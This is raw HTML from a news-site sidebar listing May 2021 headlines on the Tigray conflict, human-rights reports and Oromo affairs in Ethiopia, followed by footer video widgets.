									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://ayyaantuu.org/english/rape-is-being-used-as-weapon-of-war-in-ethiopia-say-witnesses/" title="Rape is being used as weapon of war in Ethiopia, say witnesses"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Rape Ethiopia" data-lazy-srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/6720-1-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/6720-1-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://ayyaantuu.org/wp-content/uploads/2021/05/6720-1-80x60.jpg" /><noscript><img width="80" height="60" src="https://ayyaantuu.org/wp-content/uploads/2021/05/6720-1-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Rape Ethiopia" srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/6720-1-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/6720-1-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://ayyaantuu.org/english/rape-is-being-used-as-weapon-of-war-in-ethiopia-say-witnesses/" title="Rape is being used as weapon of war in Ethiopia, say witnesses">
										Rape is being used as weapon of war in Ethiopia, say witnesses									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://ayyaantuu.org/2021/05/">May 14, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-21502 post type-post status-publish format-standard has-post-thumbnail category-english">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://ayyaantuu.org/english/ethiopia-revokes-press-credentials-of-new-york-times-reporter/" title="Ethiopia revokes press credentials of New York Times reporter"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="New York Times" data-lazy-src="https://ayyaantuu.org/wp-content/uploads/2021/05/New-York-Times-logo-80x60.jpg" /><noscript><img width="80" height="60" src="https://ayyaantuu.org/wp-content/uploads/2021/05/New-York-Times-logo-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="New York Times" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://ayyaantuu.org/english/ethiopia-revokes-press-credentials-of-new-york-times-reporter/" title="Ethiopia revokes press credentials of New York Times reporter">
										Ethiopia revokes press credentials of New York Times reporter									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://ayyaantuu.org/2021/05/">May 14, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-21498 post type-post status-publish format-standard has-post-thumbnail category-english category-human-rights">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://ayyaantuu.org/english/the-need-for-an-independent-international-investigation-of-the-axum-massacre/" title="The need for an independent international investigation of the Axum Massacre"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Amnesty International Axum" data-lazy-srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/amnesty-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/amnesty-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://ayyaantuu.org/wp-content/uploads/2021/05/amnesty-80x60.jpg" /><noscript><img width="80" height="60" src="https://ayyaantuu.org/wp-content/uploads/2021/05/amnesty-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Amnesty International Axum" srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/amnesty-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/amnesty-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://ayyaantuu.org/english/the-need-for-an-independent-international-investigation-of-the-axum-massacre/" title="The need for an independent international investigation of the Axum Massacre">
										The need for an independent international investigation of the Axum Massacre									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://ayyaantuu.org/2021/05/">May 14, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-21495 post type-post status-publish format-standard has-post-thumbnail category-english">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://ayyaantuu.org/english/notes-for-the-american-delegation/" title="Notes for the American Delegation"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="American Delegation" data-lazy-srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/Prof.-Merera-Gudina-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/Prof.-Merera-Gudina-678x509.jpg 678w, https://ayyaantuu.org/wp-content/uploads/2021/05/Prof.-Merera-Gudina-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://ayyaantuu.org/wp-content/uploads/2021/05/Prof.-Merera-Gudina-80x60.jpg" /><noscript><img width="80" height="60" src="https://ayyaantuu.org/wp-content/uploads/2021/05/Prof.-Merera-Gudina-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="American Delegation" srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/Prof.-Merera-Gudina-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/Prof.-Merera-Gudina-678x509.jpg 678w, https://ayyaantuu.org/wp-content/uploads/2021/05/Prof.-Merera-Gudina-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://ayyaantuu.org/english/notes-for-the-american-delegation/" title="Notes for the American Delegation">
										Notes for the American Delegation									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://ayyaantuu.org/2021/05/">May 13, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-21482 post type-post status-publish format-standard has-post-thumbnail category-english">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://ayyaantuu.org/english/call-for-peaceful-protest-rally-in-washington-dc-friday-may-14-2021/" title="Call for Peaceful Protest Rally Against the Terrorist Regime in Ethiopia &#8211; Washington, DC Friday, May 14, 2021"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Demonstration" data-lazy-srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/Flyer-for-May-14-2021-Demonstration-05-11-21-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/Flyer-for-May-14-2021-Demonstration-05-11-21-678x509.jpg 678w, https://ayyaantuu.org/wp-content/uploads/2021/05/Flyer-for-May-14-2021-Demonstration-05-11-21-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://ayyaantuu.org/wp-content/uploads/2021/05/Flyer-for-May-14-2021-Demonstration-05-11-21-80x60.jpg" /><noscript><img width="80" height="60" src="https://ayyaantuu.org/wp-content/uploads/2021/05/Flyer-for-May-14-2021-Demonstration-05-11-21-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Demonstration" srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/Flyer-for-May-14-2021-Demonstration-05-11-21-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/Flyer-for-May-14-2021-Demonstration-05-11-21-678x509.jpg 678w, https://ayyaantuu.org/wp-content/uploads/2021/05/Flyer-for-May-14-2021-Demonstration-05-11-21-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://ayyaantuu.org/english/call-for-peaceful-protest-rally-in-washington-dc-friday-may-14-2021/" title="Call for Peaceful Protest Rally Against the Terrorist Regime in Ethiopia &#8211; Washington, DC Friday, May 14, 2021">
										Call for Peaceful Protest Rally Against the Terrorist Regime in Ethiopia &#8211; Washington, DC Friday, May 14, 2021									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://ayyaantuu.org/2021/05/">May 13, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-21478 post type-post status-publish format-standard has-post-thumbnail category-afaan-oromoo">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://ayyaantuu.org/afaan-oromoo/bineensa-ilmaan-oromoo-fixaa-jiruun-wol-baraa/" title="Bineensa Ilmaan Oromoo fixaa jiruun Wol-baraa"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Oromoo fixaa jiruu" data-lazy-srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/ararsa-mardasa-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/ararsa-mardasa-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://ayyaantuu.org/wp-content/uploads/2021/05/ararsa-mardasa-80x60.jpg" /><noscript><img width="80" height="60" src="https://ayyaantuu.org/wp-content/uploads/2021/05/ararsa-mardasa-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Oromoo fixaa jiruu" srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/ararsa-mardasa-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/ararsa-mardasa-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://ayyaantuu.org/afaan-oromoo/bineensa-ilmaan-oromoo-fixaa-jiruun-wol-baraa/" title="Bineensa Ilmaan Oromoo fixaa jiruun Wol-baraa">
										Bineensa Ilmaan Oromoo fixaa jiruun Wol-baraa									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://ayyaantuu.org/2021/05/">May 13, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-21473 post type-post status-publish format-standard has-post-thumbnail category-english">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://ayyaantuu.org/english/western-oromia-execution-in-the-public-square/" title="Western Oromia: Execution in the Public Square"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Execution in the Public Square" data-lazy-srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/amanuel-wondimu-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/amanuel-wondimu-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://ayyaantuu.org/wp-content/uploads/2021/05/amanuel-wondimu-80x60.jpg" /><noscript><img width="80" height="60" src="https://ayyaantuu.org/wp-content/uploads/2021/05/amanuel-wondimu-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Execution in the Public Square" srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/amanuel-wondimu-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/amanuel-wondimu-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://ayyaantuu.org/english/western-oromia-execution-in-the-public-square/" title="Western Oromia: Execution in the Public Square">
										Western Oromia: Execution in the Public Square									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://ayyaantuu.org/2021/05/">May 13, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-21470 post type-post status-publish format-standard has-post-thumbnail category-english">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://ayyaantuu.org/english/eritrean-troops-disguised-as-ethiopian-military-are-blocking-critical-aid-in-tigray/" title="Eritrean troops disguised as Ethiopian military are blocking critical aid in Tigray"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Eritrean troops" data-lazy-srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/eritrean-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/eritrean-678x509.jpg 678w, https://ayyaantuu.org/wp-content/uploads/2021/05/eritrean-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://ayyaantuu.org/wp-content/uploads/2021/05/eritrean-80x60.jpg" /><noscript><img width="80" height="60" src="https://ayyaantuu.org/wp-content/uploads/2021/05/eritrean-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Eritrean troops" srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/eritrean-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/eritrean-678x509.jpg 678w, https://ayyaantuu.org/wp-content/uploads/2021/05/eritrean-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://ayyaantuu.org/english/eritrean-troops-disguised-as-ethiopian-military-are-blocking-critical-aid-in-tigray/" title="Eritrean troops disguised as Ethiopian military are blocking critical aid in Tigray">
										Eritrean troops disguised as Ethiopian military are blocking critical aid in Tigray									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://ayyaantuu.org/2021/05/">May 13, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-21467 post type-post status-publish format-standard has-post-thumbnail category-english category-human-rights">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://ayyaantuu.org/english/ethiopias-axum-findings-ignore-massacre-of-civilians/" title="Ethiopia’s Axum Findings Ignore Massacre of Civilians"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Human Rights Watch HRW" data-lazy-srcset="https://ayyaantuu.org/wp-content/uploads/2021/03/hrw-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/03/hrw-500x381.jpg 500w, https://ayyaantuu.org/wp-content/uploads/2021/03/hrw-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://ayyaantuu.org/wp-content/uploads/2021/03/hrw-80x60.jpg" /><noscript><img width="80" height="60" src="https://ayyaantuu.org/wp-content/uploads/2021/03/hrw-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Human Rights Watch HRW" srcset="https://ayyaantuu.org/wp-content/uploads/2021/03/hrw-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/03/hrw-500x381.jpg 500w, https://ayyaantuu.org/wp-content/uploads/2021/03/hrw-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://ayyaantuu.org/english/ethiopias-axum-findings-ignore-massacre-of-civilians/" title="Ethiopia’s Axum Findings Ignore Massacre of Civilians">
										Ethiopia’s Axum Findings Ignore Massacre of Civilians									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://ayyaantuu.org/2021/05/">May 13, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-21463 post type-post status-publish format-standard has-post-thumbnail category-english">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://ayyaantuu.org/english/congress-pushes-biden-administration-to-enact-sanctions-over-tigray-conflict/" title="Congress pushes Biden administration to enact sanctions over Tigray conflict"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Biden Tigray Conflict" data-lazy-srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/Pictures-of-the-Week-Europe-and-Africa-Photo-Gallery-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/Pictures-of-the-Week-Europe-and-Africa-Photo-Gallery-678x509.jpg 678w, https://ayyaantuu.org/wp-content/uploads/2021/05/Pictures-of-the-Week-Europe-and-Africa-Photo-Gallery-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://ayyaantuu.org/wp-content/uploads/2021/05/Pictures-of-the-Week-Europe-and-Africa-Photo-Gallery-80x60.jpg" /><noscript><img width="80" height="60" src="https://ayyaantuu.org/wp-content/uploads/2021/05/Pictures-of-the-Week-Europe-and-Africa-Photo-Gallery-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Biden Tigray Conflict" srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/Pictures-of-the-Week-Europe-and-Africa-Photo-Gallery-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/Pictures-of-the-Week-Europe-and-Africa-Photo-Gallery-678x509.jpg 678w, https://ayyaantuu.org/wp-content/uploads/2021/05/Pictures-of-the-Week-Europe-and-Africa-Photo-Gallery-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://ayyaantuu.org/english/congress-pushes-biden-administration-to-enact-sanctions-over-tigray-conflict/" title="Congress pushes Biden administration to enact sanctions over Tigray conflict">
										Congress pushes Biden administration to enact sanctions over Tigray conflict									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://ayyaantuu.org/2021/05/">May 13, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-21459 post type-post status-publish format-standard has-post-thumbnail category-english">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://ayyaantuu.org/english/they-set-everything-on-fire-the-paramilitary-forces-killing-people-theyre-meant-to-protect/" title="‘They Set Everything On Fire’: The Paramilitary Forces Killing People They’re Meant to Protect"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Paramilitary Forces Killing People" data-lazy-srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/wollo-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/wollo-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://ayyaantuu.org/wp-content/uploads/2021/05/wollo-80x60.jpg" /><noscript><img width="80" height="60" src="https://ayyaantuu.org/wp-content/uploads/2021/05/wollo-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Paramilitary Forces Killing People" srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/wollo-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/wollo-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://ayyaantuu.org/english/they-set-everything-on-fire-the-paramilitary-forces-killing-people-theyre-meant-to-protect/" title="‘They Set Everything On Fire’: The Paramilitary Forces Killing People They’re Meant to Protect">
										‘They Set Everything On Fire’: The Paramilitary Forces Killing People They’re Meant to Protect									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://ayyaantuu.org/2021/05/">May 13, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-21455 post type-post status-publish format-standard has-post-thumbnail category-english">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://ayyaantuu.org/english/helping-farmers-fight-droughts-and-food-insecurity-in-ethiopia/" title="Helping farmers fight droughts and food insecurity in Ethiopia"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="food insecurity in Ethiopia" data-lazy-srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/ethiopia-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/ethiopia-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://ayyaantuu.org/wp-content/uploads/2021/05/ethiopia-80x60.jpg" /><noscript><img width="80" height="60" src="https://ayyaantuu.org/wp-content/uploads/2021/05/ethiopia-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="food insecurity in Ethiopia" srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/ethiopia-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/ethiopia-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://ayyaantuu.org/english/helping-farmers-fight-droughts-and-food-insecurity-in-ethiopia/" title="Helping farmers fight droughts and food insecurity in Ethiopia">
										Helping farmers fight droughts and food insecurity in Ethiopia									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://ayyaantuu.org/2021/05/">May 12, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-21452 post type-post status-publish format-standard has-post-thumbnail category-afaan-oromoo">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://ayyaantuu.org/afaan-oromoo/ibsa-ejjennoo-jarmiyaa-abo-biyya-sudaan-irraa/" title="IBSA EJJENNOO JARMIYAA ABO BIYYA SUDAAN IRRAA"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="ABO WBO" data-lazy-srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/asxa1-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/asxa1-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://ayyaantuu.org/wp-content/uploads/2021/05/asxa1-80x60.jpg" /><noscript><img width="80" height="60" src="https://ayyaantuu.org/wp-content/uploads/2021/05/asxa1-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="ABO WBO" srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/asxa1-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/asxa1-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://ayyaantuu.org/afaan-oromoo/ibsa-ejjennoo-jarmiyaa-abo-biyya-sudaan-irraa/" title="IBSA EJJENNOO JARMIYAA ABO BIYYA SUDAAN IRRAA">
										IBSA EJJENNOO JARMIYAA ABO BIYYA SUDAAN IRRAA									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://ayyaantuu.org/2021/05/">May 12, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-21448 post type-post status-publish format-standard has-post-thumbnail category-english">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://ayyaantuu.org/english/at-least-78-priests-massacred-in-one-zone-of-tigray-leaked-letter-claims/" title="‘At least’ 78 priests ‘massacred’ in one zone of Tigray, leaked letter claims"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Tigray priests massacre" data-lazy-srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/priests-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/priests-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://ayyaantuu.org/wp-content/uploads/2021/05/priests-80x60.jpg" /><noscript><img width="80" height="60" src="https://ayyaantuu.org/wp-content/uploads/2021/05/priests-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Tigray priests massacre" srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/priests-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/priests-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://ayyaantuu.org/english/at-least-78-priests-massacred-in-one-zone-of-tigray-leaked-letter-claims/" title="‘At least’ 78 priests ‘massacred’ in one zone of Tigray, leaked letter claims">
										‘At least’ 78 priests ‘massacred’ in one zone of Tigray, leaked letter claims									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://ayyaantuu.org/2021/05/">May 12, 2021</a></span>
</div>
							</div>
						</li>			</ul></div>	</aside>	</div>
    </div>
<footer class="mh-footer" itemscope="itemscope" itemtype="https://schema.org/WPFooter">
<div class="mh-container mh-container-inner mh-footer-widgets mh-row clearfix">
<div class="mh-col-1-4 mh-widget-col-1 mh-footer-4-cols  mh-footer-area mh-footer-1">
<div id="mh_magazine_youtube-6" class="mh-footer-widget mh_magazine_youtube"><h6 class="mh-widget-title mh-footer-widget-title"><span class="mh-widget-title-inner mh-footer-widget-title-inner"><i class="fa fa-youtube-play"></i><a href="https://www.youtube.com/watch?v=Ae1hjd2UtHQ" class="mh-widget-title-link">Oromo music</a></span></h6>			<div class="mh-video-widget">
        		<div class="mh-video-container">
        			<div class="rll-youtube-player" data-src="//www.youtube.com/embed/Ae1hjd2UtHQ" data-id="Ae1hjd2UtHQ" data-query="wmode=opaque&amp;hd=1&amp;autoplay=0&amp;showinfo=1&amp;controls=2&amp;rel=1"></div><noscript><iframe seamless width="1280" height="720" src="//www.youtube.com/embed/Ae1hjd2UtHQ?wmode=opaque&amp;hd=1&amp;autoplay=0&amp;showinfo=1&amp;controls=2&amp;rel=1" allowfullscreen></iframe></noscript>
        		</div>
			</div></div><div id="mh_magazine_youtube-7" class="mh-footer-widget mh_magazine_youtube">			<div class="mh-video-widget">
        		<div class="mh-video-container">
        			<div class="rll-youtube-player" data-src="//www.youtube.com/embed/-5ALHfZgb9w" data-id="-5ALHfZgb9w" data-query="wmode=opaque&amp;hd=1&amp;autoplay=0&amp;showinfo=1&amp;controls=2&amp;rel=1"></div><noscript><iframe seamless width="1280" height="720" src="//www.youtube.com/embed/-5ALHfZgb9w?wmode=opaque&amp;hd=1&amp;autoplay=0&amp;showinfo=1&amp;controls=2&amp;rel=1" allowfullscreen></iframe></noscript>
        		</div>
